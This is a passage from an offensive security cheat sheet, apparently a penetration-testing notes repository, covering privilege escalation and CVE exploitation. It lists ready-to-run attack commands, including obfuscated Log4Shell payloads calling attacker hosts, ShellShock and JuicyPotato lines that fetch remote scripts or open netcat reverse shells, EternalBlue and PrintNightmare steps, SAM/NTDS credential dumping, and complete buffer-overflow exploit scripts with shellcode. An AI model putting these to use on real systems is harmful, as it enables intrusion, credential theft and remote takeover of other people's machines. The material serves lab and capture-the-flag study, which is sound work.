'/bin/sh;false' /etc/passwd -t --help 3478 | ``` 3479 | 3480 | ### Systemctl 3481 | 3482 | ```bash 3483 | # SUID 3484 | -> https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740 3485 | 3486 | ``` 3487 | 3488 | ### Screen 3489 | 3490 | ```bash 3491 | # SUID 3492 | -> screen -x root/shared 3493 | -> 3494 | https://possiblelossofprecision.net/?p=1993 3495 | 3496 | # SUDO 3497 | -> sudo 
screen 3498 | ``` 3499 | 3500 | # D. Exploit/CVE/Abuse/Misconf 3501 | 3502 | ### Sudo - Security Bypass 3503 | 3504 | ```bash 3505 | # What we will see? 3506 | (ALL,!root) /bin/bash 3507 | (ALL, !root) /usr/bin/ssh 3508 | 3509 | # Commands 3510 | sudo -u#-1 ssh -o ProxyCommand=';sh 0<&2 1>&2' x 3511 | sudo -u#-1 /bin/bash 3512 | 3513 | # References 3514 | https://www.exploit-db.com/exploits/47502 3515 | ``` 3516 | 3517 | ### Zero Logon (CVE-2020-1472) 3518 | 3519 | ```bash 3520 | => Github 3521 | $ https://github.com/dirkjanm/CVE-2020-1472 3522 | 3523 | => Commands (Exploit) 3524 | $ python3 cve-2020-1472-exploit.py BANK 10.10.10.10 3525 | 3526 | => Commands (Restore Password) 3527 | $ Get plain_password_hex 3528 | -> secretsdump.py bank.local/Administrator@BANK -target-ip 10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460 3529 | $ python3 restorepassword.py return.local/printer@printer -target-ip 10.10.11.108 -hexpass 3530 | 3531 | => References 3532 | $ https://nv2lt.github.io/windows/CVE-2020-1472-Step-by-Step-Procedure/ 3533 | 3534 | ``` 3535 | 3536 | ### NoPac (CVE-2021-42278 & CVE-2021-42287) 3537 | 3538 | ```bash 3539 | => GitHub 3540 | $ https://github.com/Ridter/noPac 3541 | 3542 | => Commands 3543 | $ python3 noPac.py bank.local/user:password -dc-ip 10.0.10.10 -dc-host DC01 --impersonate administrator -dump 3544 | 3545 | => References 3546 | $ https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing 3547 | ``` 3548 | 3549 | ### Log4J 3550 | 3551 | ```bash 3552 | => Marshalsec 3553 | $ git clone https://github.com/mbechler/marshalsec.git 3554 | $ cd marshalsec 3555 | $ sudo apt install maven 3556 | $ mvn clean package -DskipTests 3557 | 3558 | => Payload 3559 | ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/} 3560 | ${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/} 3561 | 
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z} 3562 | ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 3563 | ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 3564 | ${${::-j}ndi:rmi://attackerendpoint.com/} 3565 | ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc} 3566 | ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc} 3567 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/} 3568 | ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc} 3569 | ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/} 3570 | ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc} 3571 | ${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/} 3572 | ${jndi:ldap://ATTACKERCONTROLLEDHOST} 3573 | ${jndi:rmi://adsasd.asdasd.asdasd} 3574 | 3575 | => Exploit (1) 3576 | $ https://github.com/veracode-research/rogue-jndi 3577 | $ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,}|{base64,-d}|{bash,-i}" --httpPort 8888 --hostname 10.10.10.10 3578 | $ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "nc -e /bin/sh 10.10.10.10 1337" --httpPort 8888 --hostname 10.10.10.10 3579 | $ ${jndi:ldap://10.10.10.10/o=tomcat} 3580 | 3581 | => References 3582 | $ https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ 3583 | $ https://twitter.com/marcioalm/status/1470361495405875200?s=20 3584 | $ https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java 3585 | $ https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf 3586 | $ https://www.sprocketsecurity.com/blog/how-to-exploit-log4j-vulnerabilities-in-vmware-vcenter 3587 | ``` 3588 | 3589 | ### ShellShock 3590 | 3591 | ```bash 3592 | # Payload 3593 | curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat 
/etc/passwd'" http://10.10.10.10/cgi-bin/test.cgi 3594 | curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOS4xMjMvNDQzIDA+JjE= | base64 -d | bash'" http://10.10.10.10/cgi-bin/admin.cgi 3595 | 3596 | # Refernces 3597 | https://github.com/opsxcq/exploit-CVE-2014-6271 3598 | ``` 3599 | 3600 | ### CVE-2021-41773 & CVE-2021-42013 3601 | 3602 | ```bash 3603 | # Affected Version 3604 | -> Apache 2.4.49 3605 | -> Apache 2.4.50 3606 | 3607 | # References 3608 | -> https://github.com/iilegacyyii/PoC-CVE-2021-41773 3609 | -> https://www.exploit-db.com/exploits/50406 3610 | ``` 3611 | 3612 | ### MS-17-010 3613 | 3614 | ```bash 3615 | # Commands 3616 | git clone https://github.com/helviojunior/MS17-010.git 3617 | msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 -f exe > eternalblue.exe 3618 | nc -nlvp 443 3619 | python send_and_execute.py 10.10.10.4 //eternalblue.exe 3620 | python checker.py 10.10.10.10 3621 | 3622 | # Change username if needed for authentication 3623 | 3624 | # References 3625 | - https://github.com/helviojunior/MS17-010.git 3626 | - https://www.hackers-arise.com/post/2018/11/30/network-forensics-part-2-packet-level-analysis-of-the-eternalblue-exploit 3627 | ``` 3628 | 3629 | ### MS08-067 3630 | 3631 | ```bash 3632 | # Commands 3633 | msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode -a x86 --platform windows 3634 | # Replace the b" -> " 3635 | nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.10.10.4 # Check versio 3636 | # Replace the shellcode inside the exploit script 3637 | # Ensure the payload total would be 410 3638 | # "\x90" * (410 - len(shellcode)) 3639 | 3640 | # Run Exploit 3641 | # 7 -> Windows XP SP3 English (AlwaysOn NX) 3642 | python exploit.py 10.10.10.4 7 445 3643 | 3644 | # References 3645 | - https://www.exploit-db.com/exploits/40279 3646 | ``` 3647 | 
3648 | ### SeImpersonatePrivilege 3649 | 3650 | ```bash 3651 | # Tecnique 1 3652 | wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe 3653 | PrintSpoofer.exe -i -c cmd 3654 | .\PrintSpoofer.exe -i -c "whoami" 3655 | .\PrintSpoofer.exe -i -c "powershell ls" 3656 | .\PrintSpoofer.exe -i -c "powershell.exe -e YwBhAHQAIAAvAHUAcwBlAHIAcwAvAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIALwBkAGUAcwBrAHQAbwBwAC8AcgBvAG8AdAAuAHQAeAB0AA==" 3657 | 3658 | # Technique 2 3659 | ##First 3660 | git clone https://github.com/CCob/SweetPotato.git 3661 | run .sln and compile as .exe (Make sure off anti-virus first) 3662 | SweetPotato.exe -p cmd.exe 3663 | 3664 | ##Second 3665 | git clone https://github.com/uknowsec/SweetPotato.git 3666 | run .sln and compile as .exe (Make sure off anti-virus first) 3667 | SweetPotato.exe -a "whoami" 3668 | 3669 | # Technique 3 3670 | wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe 3671 | JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t * 3672 | JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t * 3673 | JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t * 3674 | 3675 | # Metasploit 3676 | 3677 | ``` 3678 | 3679 | ### SeBackupPrivilege 3680 | 3681 | ```bash 3682 | # How to grant this privilege? 
3683 | powershell -ep bypass 3684 | Enable-PSRemoting -Force 3685 | Install-Module -Name carbon 3686 | Import-Module carbon 3687 | Grant-CPrivilege -Identity aniq -Privilege SeBackupPrivilege 3688 | Test-CPrivilege -Identity aniq -Privilege SeBackupPrivilege 3689 | 3690 | # Commands (1) 3691 | cd c:\ 3692 | mkdir Temp 3693 | reg save hklm\sam c:\Temp\sam 3694 | reg save hklm\system c:\Temp\system 3695 | cd Temp 3696 | download sam 3697 | download system 3698 | pypykatz registry --sam sam system 3699 | 3700 | # Commands (2) 3701 | nano aniq.dsh 3702 | -> set context persistent nowriters 3703 | -> add volume c: alias aniq 3704 | -> create 3705 | -> expose %aniq% z: 3706 | unix2dos aniq.dsh 3707 | cd C:\Temp 3708 | upload aniq.dsh 3709 | diskshadow /s aniq.dsh 3710 | robocopy /b z:\windows\ntds . ntds.dit 3711 | reg save hklm\system c:\Temp\system 3712 | cd C:\Temp 3713 | download ntds.dit 3714 | download system 3715 | secretsdump.py -ntds ntds.dit -system system local 3716 | 3717 | # References 3718 | https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/ 3719 | ``` 3720 | 3721 | ### MS11-046 3722 | 3723 | ```bash 3724 | # Save it in one file 3725 | exploit.c 3726 | 3727 | # Compile 3728 | sudo apt-get update 3729 | sudo apt-get install mingw-w64 3730 | i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32 3731 | 3732 | # Run 3733 | exploit.exe 3734 | 3735 | # References 3736 | - https://www.exploit-db.com/exploits/40564 3737 | ``` 3738 | 3739 | ### MS16-098 3740 | 3741 | ```bash 3742 | # Download 3743 | wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe 3744 | 3745 | # Usage 3746 | exploit.exe 3747 | 3748 | # References 3749 | https://www.exploit-db.com/exploits/41020 3750 | ``` 3751 | 3752 | ### MS10-059 3753 | 3754 | ```bash 3755 | # Download 3756 | wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe 3757 | 3758 | # Usage (Reverse 
Shell) 3759 | exploit.exe 10.10.14.16 9002 3760 | 3761 | # References 3762 | ``` 3763 | 3764 | ### Token Kidnapping (Windows 2003) 3765 | 3766 | ```bash 3767 | # Download 3768 | wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe 3769 | 3770 | # Usage 3771 | churrasco.exe "whoami" 3772 | 3773 | # References 3774 | https://www.exploit-db.com/exploits/6705 3775 | ``` 3776 | 3777 | ### DirtySock 3778 | 3779 | ```bash 3780 | # Download 3781 | wget https://github.com/initstring/dirty_sock/archive/master.zip 3782 | 3783 | # Usage 3784 | unzip 3785 | cd dirty_sock 3786 | python3 dirty_sockv2.py 3787 | 3788 | # Then 3789 | su dirty_sock 3790 | * dirty_sock 3791 | ``` 3792 | 3793 | ### ChrootKit 3794 | 3795 | ```bash 3796 | - If you found chrootkit run in background then you can try this 3797 | 3798 | # Steps 3799 | echo "cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash" > /tmp/update 3800 | /tmp/bash -p 3801 | ``` 3802 | 3803 | ### IIS 6.0 (CVE-2017-7269) 3804 | 3805 | ```bash 3806 | # Download 3807 | wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell -O exploit.py 3808 | 3809 | # Usage 3810 | python exploit.py 10.10.10.10 80 10.10.10.20 443 3811 | ``` 3812 | 3813 | ### AlwaysInstall Elevated 3814 | 3815 | ```bash 3816 | # Payload 3817 | msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=9002 –f msi > install.msi 3818 | msfvenom -p windows/x64/shell_reverse_tcp lhost=tun0 lport=9002 –f msi > install.msi 3819 | msiexec /quiet /qn /i install.msi 3820 | ``` 3821 | 3822 | ### Ptrace 3823 | 3824 | ```bash 3825 | # Download 3826 | wget https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c 3827 | 3828 | # Compile 3829 | gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root 3830 | 3831 | # Usage 3832 | ./ptrace_traceme_root 3833 | ``` 3834 | 3835 | ### FTP Backdoor Command Execution 3836 | 3837 | ```bash 3838 | # Download 3839 | wget 
https://raw.githubusercontent.com/ahervias77/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py 3840 | 3841 | # Manually 3842 | - Use "user:)" as user and use "pass" as pass 3843 | └─▶ ftp 10.10.10.131 3844 | Connected to 10.10.10.131. 3845 | 220 (vsFTPd 2.3.4) 3846 | Name (10.10.10.131:root): user:) 3847 | 331 Please specify the password. 3848 | Password: pass 3849 | 3850 | # Usage 3851 | └─▶ python3 vsftpd_234_exploit.py 10.150.150.12 21 whoami 3852 | [*] Attempting to trigger backdoor... 3853 | [+] Triggered backdoor 3854 | [*] Attempting to connect to backdoor... 3855 | [+] Connected to backdoor on 10.150.150.12:6200 3856 | [+] Response: 3857 | root 3858 | 3859 | # References 3860 | - https://www.programmersought.com/article/18706301160/ 3861 | ``` 3862 | 3863 | ### Shadow Writable 3864 | 3865 | ```bash 3866 | - Generate weak password in http://sha512crypt.pw/ 3867 | 3868 | # Example - password 3869 | $6$Zwdp3uo2Hg1HUvlc$wYEAwd5o9C5xQ1yX97izpRp/IhH4Dk1BzgprmQmK2P9/GnYTCIxzpF63/jelcdi6FjSIXxbirfn8o2gR1rHZq0 3870 | 3871 | - replace in root hash 3872 | 3873 | # Commands 3874 | su root 3875 | ``` 3876 | 3877 | ### Laravel Remote Code Execution (CVE-2018-15133) 3878 | 3879 | ```bash 3880 | # Step By Step 3881 | 1. Get APP_KEY 3882 | * APP_KEY=base64:d2PlewM8mV4bhlJZQTqvatC3XWexy+AlMqUwCP6YuKg= 3883 | 2. Use phpgc (Command) 3884 | * ./phpggc Laravel/RCE1 system "id" -b 3885 | * ./phpggc Laravel/RCE2 system "id" -b 3886 | * ./phpggc Laravel/RCE3 system "id" -b 3887 | * ./phpggc Laravel/RCE4 system "id" -b 3888 | * ./phpggc Laravel/RCE5 system "id" -b 3889 | * ./phpggc Laravel/RCE6 system "id" -b 3890 | * ./phpggc Laravel/RCE7 system "id" -b 3891 | 3. Use the CVE php script 3892 | * ./cve-2018-15133.php 3893 | 4. 
Put it in cookie (POST) 3894 | 3895 | # Notes 3896 | -> Remember on gadgetchains/Laravel/RCE, there is others that you can try 3897 | 3898 | # References 3899 | https://github.com/kozmic/laravel-poc-CVE-2018-15133 3900 | https://snyk.io/vuln/SNYK-PHP-LARAVELFRAMEWORK-174581 3901 | ``` 3902 | 3903 | ### OpenSMPTD < 6 (Local Privesc) 3904 | 3905 | ```bash 3906 | # Save as exploit.pl 3907 | https://www.exploit-db.com/exploits/48051 3908 | 3909 | # Usage 3910 | perl exploit.pl LPE #local 3911 | perl exploit.pl RCE 10.0.0.162 10.0.0.24 example.org 3912 | ``` 3913 | 3914 | ### CVE-2021-32749 3915 | 3916 | ```bash 3917 | # Payload 3918 | ~! 3919 | ~! bash 3920 | 3921 | # Referemces 3922 | https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm 3923 | https://hackmyvm.eu/machines/machine.php?vm=Texte 3924 | ``` 3925 | 3926 | 3927 | ### PHP Info + LFI 3928 | 3929 | ```bash 3930 | # Downloads 3931 | https://raw.githubusercontent.com/roughiz/lfito_rce/master/lfito_rce.py 3932 | 3933 | # Commands 3934 | -> python lfito_rce.py -l "http://10.10.10.10/test.php?page=" --lhost 10.10.10.9 --lport 9001 -i "http://10.10.10.105/info.php" -t 100 -a 1 --payload 2 --verbose true 3935 | 3936 | # References 3937 | -> https://rafalharazinski.gitbook.io/security/other-web-vulnerabilities/local-remote-file-inclusion/phpinfo-log-race-condition 3938 | => https://raw.githubusercontent.com/VineshChauhan24/LFI-phpinfo-RCE/master/exploit.py 3939 | ``` 3940 | 3941 | ### DirtyCow 3942 | 3943 | ```bash 3944 | # Download 3945 | https://github.com/exrienz/DirtyCow 3946 | 3947 | # Usage 3948 | gcc -pthread dirty.c -o dirty -lcrypt 3949 | ./dirty password 3950 | ``` 3951 | 3952 | ### Linux Kernel Exploit 3953 | 3954 | ```bash 3955 | # Kernel 3956 | 3957 | # <= 2.6.36-rc8 3958 | - https://www.exploit-db.com/exploits/15285 3959 | 3960 | # < 2.6.37 3961 | - https://www.exploit-db.com/exploits/15704 3962 | 3963 | # < 3.10 3964 | - https://www.exploit-db.com/exploits/18411 3965 | * 
https://github.com/lucyoa/kernel-exploits/tree/master/memodipper 3966 | 3967 | # < 3.19 3968 | - https://www.exploit-db.com/exploits/37292 3969 | 3970 | # = 3.2.0.23 (Ubuntu 12.04) 3971 | - https://www.exploit-db.com/exploits/33589 3972 | 3973 | # <= 4.4.0-116 3974 | - https://www.exploit-db.com/exploits/44298 3975 | 3976 | # < 5.11 3977 | - https://github.com/briskets/CVE-2021-3493 3978 | 3979 | # References 3980 | -> https://github.com/evait-security/ClickNRoot (Kernel Exploit) 3981 | ``` 3982 | 3983 | ### SambaCry RCE: CVE-2017–7494 3984 | 3985 | ```bash 3986 | # Vulnerable Versions 3987 | - Within versions 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14. 3988 | 3989 | # Downloads 3990 | https://github.com/joxeankoret/CVE-2017-7494 3991 | 3992 | # Commands (Metasploit) 3993 | use linux/samba/is_known_pipename 3994 | set SMB::AlwaysEncrypt false 3995 | set SMB::ProtocolVersion 1 3996 | set rhosts 10.10.10.10 3997 | 3998 | # Commands Manual 3999 | 4000 | 4001 | # References 4002 | - https://bond-o.medium.com/sambacry-rce-cve-2017-7494-41c3dcc0b7ae 4003 | ``` 4004 | 4005 | ### Microsoft Exchange Server RCE (CVE-2021-26855) 4006 | 4007 | ```bash 4008 | # References 4009 | - https://motasem-notes.net/how-to-test-if-your-exchange-server-is-compromised-and-vulnerable/ 4010 | - https://github.com/microsoft/CSS-Exchange/tree/main/Security 4011 | - https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers 4012 | ``` 4013 | 4014 | ### PrintNightmare (CVE-2021-1675) 4015 | 4016 | ```bash 4017 | # Download 4018 | https://github.com/afwu/PrintNightmare 4019 | 4020 | # Check If vulnerable (If Got Values) 4021 | rpcdump.py @10.10.120.242 | egrep 'MS-RPRN|MS-PAR' 4022 | 4023 | # Sysmon (Look into) 4024 | - Event 11 -> spoolsv.exe Writing 4025 | - Event 23 -> Deleting .dll files on C:\Windows\System32\spool\drivers\x64\* 4026 | 4027 | # Disabling Print Spooler Service 4028 | Stop-Service -Name Spooler -Force 4029 | Set-Service -Name Spooler -StartupType 
Disabled 4030 | 4031 | # Monitor 4032 | - Log entries in Microsoft-Windows-PrintService/Admin 4033 | 4034 | # Enabled 4035 | - Microsoft-Windows-PrintService/Operational logging 4036 | 4037 | # Detection References 4038 | https://github.com/LaresLLC/CVE-2021-1675 4039 | 4040 | # Exploit (https://github.com/cube0x0/CVE-2021-1675) 4041 | msfvenom -p windows/x64/exec CMD='cmd.exe /k "net localgroup administrators username /add"' EXITFUNC=none RC4PASSWORD=S3cr3tP4sw0rdz123 -f dll -o payload.dll 4042 | .\SharpPrintNightmare.exe C:\Users\username\Documents\payload.dll 4043 | -> Make sure read the installation first. 4044 | 4045 | # Local 4046 | IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.6/payload.ps1') 4047 | Invoke-Nightmare -NewUser "username" -NewPassword "password" 4048 | 4049 | # Remote 4050 | msfvenom -p windows/x64/exec CMD='cmd.exe /k "net user /add test123 test123 && net localgroup administrators test123 /add"' EXITFUNC=none -f dll -o payload.dll 4051 | ./CVE-2021-1675.py bank.local/username:password@10.10.10.10 'C:\Users\users\Documents\payload.dll' 4052 | 4053 | # Detect 4054 | REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" 4055 | 4056 | # References 4057 | https://msandbu.org/printnightmare-cve-2021-1675/ 4058 | https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution 4059 | https://community.carbonblack.com/t5/Query-Exchange/Finding-Registry-Keys-Used-for-PrintNightmare-CVE-2021-34527/idi-p/105368 4060 | ``` 4061 | 4062 | ### Buffer Overflow (BOF) 4063 | 4064 | ```bash 4065 | =======Setup mona.py======= 4066 | # Download mona.py 4067 | wget https://raw.githubusercontent.com/corelan/mona/master/mona.py 4068 | 4069 | # Upload into the machine 4070 | certutil -URLCache -f http://10.10.10.10/mona.py mona.py 4071 | 4072 | # Put into Immunity Debugger Folder 4073 | C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\mona.py 4074 | @ 
4075 | C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands\mona.py 4076 | 4077 | # Run Immunity Debugger and config mona (Make sure run as Administrator) 4078 | !mona config -set workingfolder c:\mona\%p 4079 | 4080 | =======Mona Commands======= 4081 | # Config Mona 4082 | !mona config -set workingfolder c:\mona\%p 4083 | 4084 | # Create bytearray 4085 | !mona bytearray -b "\x00" # BadCharacter 4086 | 4087 | # Find Offset with length of pattern created 4088 | !mona findmsp -distance 2400 4089 | 4090 | # Compare bad characters with ESP 4091 | !mona compare -f C:\mona\binary\bytearray.bin -a 0124FA18 #ESP 4092 | 4093 | # Find the jump point 4094 | !mona jmp -r esp -cpb "\x00\x0a" # BadCharacter 4095 | 4096 | =======Fuzzing (fuzzer.py)======= 4097 | import socket, time, sys 4098 | 4099 | ip = "192.168.0.195" 4100 | 4101 | port = 31337 4102 | timeout = 5 4103 | strings = b"A" * 50 4104 | 4105 | while True: 4106 | try: 4107 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4108 | s.settimeout(timeout) 4109 | s.connect((ip,port)) 4110 | s.send(strings + b"\r\n") 4111 | print(s.recv(1024)) 4112 | except: 4113 | print("Fuzzing crashed at {} bytes".format(len(strings))) 4114 | sys.exit(0) 4115 | strings += b"A" * 50 4116 | time.sleep(1) 4117 | 4118 | =======Finding offset======= 4119 | msf-pattern_create -l 150 # Create Pattern 4120 | !mona findmsp -distance 150 # Mona commands to find offset 4121 | 4122 | # crash.py 4123 | import socket, time, sys 4124 | 4125 | ip = "192.168.0.195" 4126 | port = 31337 4127 | 4128 | payload = b"" 4129 | 4130 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4131 | s.connect((ip,port)) 4132 | s.send(payload + b"\r\n") 4133 | print(s.recv(1024)) 4134 | 4135 | # crash2.py 4136 | import socket, time, sys 4137 | 4138 | ip = "192.168.0.195" 4139 | port = 31337 4140 | 4141 | offset = 146 4142 | overflow = b"A" * offset 4143 | retrn = b"BBBB" 4144 | payload = overflow + retrn 4145 | 4146 | s = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM) 4147 | s.connect((ip,port)) 4148 | s.send(payload + b"\r\n") 4149 | print(s.recv(1024)) 4150 | 4151 | =======Finding Bad Characters & Jump Point======= 4152 | !mona bytearray -b "\x00" # Generate Bytearray 4153 | !mona compare -f C:\mona\gatekeeper\bytearray.bin -a 020C19F8 # Check bad character we found 4154 | !mona jmp -r esp -cpb "\x00\x0a" # Find jump point 4155 | 4156 | # badchar.py 4157 | print("\t----------------------") 4158 | print("\t| BAD CHARACTER |") 4159 | print("\t----------------------") 4160 | print("\n[+] Example No Badchar (Please include \\x00) => Enter Bad Characters: \\x00") 4161 | print("[+] Example Got Badchar => Enter Bad Characters: \\x02\\x03\\x04") 4162 | 4163 | INPUTS = raw_input("\n[+] Enter Bad Characters: ") 4164 | OUTPUT_INPUTS = r"{0}".format(INPUTS) 4165 | LISTREM = INPUTS.split("\\x") 4166 | LISTBADCHAR = r"" 4167 | for x in range(1,256): 4168 | if "{:02x}".format(x) not in LISTREM: 4169 | LISTBADCHAR += r"\x" + "{:02x}".format(x) 4170 | print(LISTBADCHAR) 4171 | 4172 | # badchar_check.py 4173 | import socket, time, sys 4174 | 4175 | ip = "192.168.0.195" 4176 | port = 31337 4177 | 4178 | offset = 146 4179 | overflow = b"A" * offset 4180 | retrn = b"BBBB" 4181 | strings = b"" 4182 | payload = overflow + retrn + strings 4183 | 4184 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4185 | s.connect((ip,port)) 4186 | s.send(payload + b"\r\n") 4187 | print(s.recv(1024)) 4188 | 4189 | =======Final======= 4190 | # msfvenom 4191 | msfvenom -p windows/shell_reverse_tcp LHOST=eth0 LPORT=443 -b '\x00\x0a' EXITFUNC=thread -f python -v strings 4192 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=443 -b '\x00\x0a' EXITFUNC=thread -f python -v strings 4193 | 4194 | # exploit.py 4195 | import socket, time, sys 4196 | 4197 | ip = "192.168.0.195" 4198 | port = 31337 4199 | 4200 | offset = 146 4201 | overflow = b"A" * offset 4202 | retrn = b"\xc3\x14\x04\x08" 4203 | strings = b"" 4204 | strings += 
b"\xbf\xa3\xe1\x47\xc1\xda\xd7\xd9\x74\x24\xf4\x5e" 4205 | # 4206 | padding = b"\x90" * 16 4207 | payload = overflow + retrn + padding + strings 4208 | 4209 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4210 | s.connect((ip,port)) 4211 | s.send(payload + b"\r\n") 4212 | print(s.recv(1024)) 4213 | 4214 | =======References======= 4215 | https://medium.com/swlh/tryhackme-buffer-overflow-prep-9b2ece17a13c 4216 | https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/ 4217 | https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice.git 4218 | ``` 4219 | 4220 | ### Sequoia (CVE-2021-33909) 4221 | 4222 | ```bash 4223 | # Download 4224 | https://github.com/AmIAHuman/CVE-2021-33909 4225 | 4226 | # Usage 4227 | gcc exploit.c -o exploit 4228 | chmod +x exploit 4229 | ./exploit 4230 | 4231 | # References 4232 | https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909 4233 | https://github.com/AmIAHuman/CVE-2021-33909 4234 | ``` 4235 | 4236 | ### MariaDB (CVE-2021-27928) 4237 | 4238 | ``` 4239 | # Steps 4240 | 1. Set Payload 4241 | msfvenom -p linux/x64/shell/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f elf-so -o shell.so 4242 | 4243 | 2. Transfer to Target 4244 | curl 10.10.10.10/shell.so -o /tmp/shell.so 4245 | 4246 | 3. Listen 4247 | nc -lnvp 1234 4248 | 4249 | 4. 
Execute the payload 4250 | mysql -u root -p 4251 | SET GLOBAL wsrep_provider="/tmp/shell.so"; 4252 | 4253 | # References 4254 | https://github.com/Al1ex/CVE-2021-27928 4255 | ``` 4256 | 4257 | ### Gshadow (/etc/gshadow) 4258 | 4259 | ```bash 4260 | # Steps 4261 | -> Ensure /etc/gshadow is writable 4262 | -> Put current user to the sudo group 4263 | * sudo:*::username 4264 | -> newgrp sudo (login to sudo group) 4265 | -> sudo bash 4266 | 4267 | # References 4268 | https://nepcodex.com/2021/10/tranquil-writeup-hackmyvm-walkthrough/ 4269 | ``` 4270 | 4271 | ### Apache Struts CVE-2017-5638 4272 | 4273 | ```bash 4274 | # Commands 4275 | python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 4276 | 4277 | # Checking 4278 | python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 4279 | 4280 | # References 4281 | https://github.com/mazen160/struts-pwn 4282 | ``` 4283 | 4284 | # E. CMS/Web/Application 4285 | 4286 | ### Moodle 4287 | 4288 | ```bash 4289 | # Moodlescan 4290 | https://github.com/inc0d3/moodlescan 4291 | python3 moodlescan.py -u http://10.10.10.10/moodle 4292 | 4293 | # Manual Check version 4294 | http://10.10.10.10/moodle/composer.lock 4295 | 4296 | # Exploit 3.4.1 4297 | https://raw.githubusercontent.com/darrynten/MoodleExploit/master/MoodleExploit.php 4298 | -> php MoodleExploit.php url=http://10.10.10.10/moodle user=username pass=password ip=10.10.10.11 port=4444 course=2 debug=true 4299 | -> /*{a*/`$_GET[0]`;//{x}} 4300 | -> &0= 4301 | 4302 | 4303 | ``` 4304 | 4305 | ### Wordpress 4306 | 4307 | ```bash 4308 | # Wpscan 4309 | wpscan --url https://10.10.10.10/blog/ -e u,vp --disable-tls-checks 4310 | wpscan --url http://10.10.10.10/blog/ -e u --passwords rockyou.txt 4311 | wpscan --url http://10.10.10.10/ --usernames kwheel,bjoel --passwords rockyou.txt 4312 | 4313 | # Location 4314 | /wp-content/plugins/ 4315 | 4316 | # Default Credentials 4317 | admin:password 4318 | wordpress:wordpress 4319 | 
